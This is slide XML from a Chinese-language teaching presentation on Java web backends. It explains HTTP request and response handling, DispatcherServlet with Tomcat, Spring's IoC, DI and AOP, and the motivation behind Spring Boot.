        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251300" y="4163198"/>
            <a:ext cx="3454400" cy="2552700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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矩形: 对角圆角 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699650" y="4643512"/>
            <a:ext cx="10295176" cy="1534491"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9194"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000">
              <a:alpha val="10196"/>
            </a:srgbClr>
          </a:solid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pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1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请求响应：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1"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628650" lvl="1" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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请求（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="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HttpServletRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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）：获取请求数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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628650" lvl="1" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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响应（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="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HttpServletResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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）：设置响应数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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628650" lvl="1" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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BS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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架构：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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Browser/Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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，浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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服务器架构模式。客户端只需要浏览器，应用程序的逻辑和数据都存储在服务端。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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矩形: 圆角 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699650" y="1321641"/>
            <a:ext cx="10298097" cy="3122574"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3016"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFEF"/>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lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                  <a:alpha val="59000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形: 圆角 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6518899" y="1419600"/>
            <a:ext cx="3570931" cy="2590913"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4938"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FEF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43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2006028" y="2974185"/>
            <a:ext cx="4335105" cy="53801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533868" y="2522876"/>
            <a:ext cx="923433" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266651" y="3243190"/>
            <a:ext cx="807022" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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浏览器</a:t>
            </a:r>
            <a:endPar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p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7425782" y="4044369"/>
            <a:ext cx="1467935" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pP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Web</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服务器</a:t>
            </a:r>
            <a:endPar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框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="473671">
            <a:off x="3672120" y="3220440"/>
            <a:ext cx="543739" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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响应</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矩形: 圆角 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6691201" y="1672098"/>
            <a:ext cx="3222783" cy="2093310"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3205"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="635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225960" y="2429569"/>
            <a:ext cx="780070" cy="786974"/>
            <a:chOff x="1288572" y="3466291"/>
            <a:chExt cx="1076475" cy="1086002"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="图片 13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1288572" y="3466291"/>
              <a:ext cx="1076475" cy="1086002"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="图片 14"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1602940" y="3784462"/>
              <a:ext cx="447737" cy="447737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形: 剪去单角 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8339973" y="1921549"/>
            <a:ext cx="1404509" cy="388672"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AA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XxxController</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="13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矩形: 剪去单角 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8333967" y="2549587"/>
            <a:ext cx="1408513" cy="388672"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AA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XxxController</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矩形: 剪去单角 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8338087" y="3184557"/>
            <a:ext cx="1408513" cy="388673"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AA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XxxController</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="13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9" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8417660" y="4028584"/>
            <a:ext cx="1005254" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pP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(Tomcat)</a:t>
            </a:r>
            <a:endPar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矩形: 剪去单角 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899855" y="1951250"/>
            <a:ext cx="1106564" cy="1612850"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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Dispatcher</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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en-US" altLang="zh-CN" sz="13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Servlet</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="13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箭头: 右 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19447947">
            <a:off x="7801698" y="2151627"/>
            <a:ext cx="595474" cy="193693"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 12194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60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7864903" y="2655267"/>
            <a:ext cx="469064" cy="187085"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 10839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61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2030693">
            <a:off x="7792372" y="3111230"/>
            <a:ext cx="595474" cy="198042"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 10395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62"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2006028" y="1978773"/>
            <a:ext cx="4352861" cy="60855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rot="21025751">
            <a:off x="3618581" y="2051303"/>
            <a:ext cx="543739" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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请求</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文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21025751">
            <a:off x="1994363" y="1797362"/>
            <a:ext cx="3760966" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="140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http://localhost:8080/hello?name=heima</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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1709351" y="2186196"/>
            <a:ext cx="7772400" cy="3189943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1787095" y="1816864"/>
            <a:ext cx="6094970" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181818"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>执行流程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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Springboot</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后端技术</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31140" y="1147445"/>
            <a:ext cx="11758295" cy="5166360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Spring是一个开源容器框架，可以接管web层，业务层，dao层，持久层的组件，并且可以配置各种bean,和维护bean与bean之间的关系。其核心就是控制反转(IOC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/DI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>),和面向切面(AOP),简单的说就是一个分层的轻量级开源框架。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是控制正转：如果我们要使用某个对象，就需要自己负责对象的创建。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> (User user = new User())</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是控制反转IoC（Inversion of Control）：其具体就是由容器来控制对象的生命周期和业务对象之间的依赖关系，而不是像传统方式(new 对象)中由代码来直接控制，也就是说IoC容器让对象的创建不用去new了，而是由Spring自动生产，使用java的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>反射机制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，根据配置文件在运行时动态的去创建对象以及管理对象，并调用对象的方法。控制反转的本质是控制权由应用代码转到了外部容器(IoC容器)，控制权的转移即是所谓的反转。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>IoC并不是一门技术，而是一种设计思想，IoC和DI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>依赖注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其实是同一个概念只是从不同的角度描述罢了(IoC是一种思想，而DI则是一种具体的技术实现手段)。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>IoC是目的(它的目的是创建对象)，DI是手段(通过什么手段获取外部对象)。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IOC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是工厂</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(负责对象的生命周期和对象之间的依赖关系)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是装配。</a:t>
            </a:r>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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后端技术</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34035" y="1526540"/>
            <a:ext cx="5715000" cy="2447925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="534035" y="4401820"/>
            <a:ext cx="5857875" cy="1504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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后端技术</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50825" y="1223645"/>
            <a:ext cx="11661775" cy="5408295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>AOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：为Aspect Oriented Programming的缩写，即面向切面编程（也叫面向方面），是一种可以通过预编译方式和运行期</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>动态代理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现在不修改源代码的情况下给程序动态统一添加功能的一种技术。简化代码：把方法中的重复代码横向抽取到切面中，它是对方法的增强，主要应用在日志记录，事务处理，权限校验。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>横向抽取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</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什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>OOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：简化代码：把重复代码纵向抽取到父类，OOP的三大特征继承、封装、多态，它主要是为了实现编程的重用性、灵活性和扩展性，强调的是类之间的层次关系。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(纵向抽取)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="593090" y="4358005"/>
            <a:ext cx="4305300" cy="2019300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="2080895"/>
            <a:ext cx="2318385" cy="1649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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后端技术</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文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231775" y="1301115"/>
            <a:ext cx="11546205" cy="5106035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:t>随着Spring发展的越来越火，Spring也慢慢从一个小而精的框架变成了，一个覆盖面广大而全的框架，另一方面随着新技术的发展，比如nodejs、golang、Ruby的兴起，让Spring逐渐看着笨重起来，大量繁琐的XML配置和第三方整合配置，让Spring使用者痛苦不已， 因为在思考 Spring 特性配置和解决业务问题之间需要进行思维切换，所以写配置挤占了写应用程序逻辑的时间。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SpringBoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>延续了spring框架的核心思想IOC和AOP，使用了特定的方式来进行配置，从而使开发人员不再需要定义样板化的配置，简化Spring应用的创建、运行、调试、部署等而出现的，使用它可以做到专注于Spring应用的开发，而无需过多关注XML的配置。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>约定大于配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的脚手架</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Spring Boot其实就是一个整合很多可插拔的组件（框架），内嵌了使用工具（比如内嵌了Tomcat、Jetty等），方便开发人员快速搭建和开发的一个框架。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>自动装配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
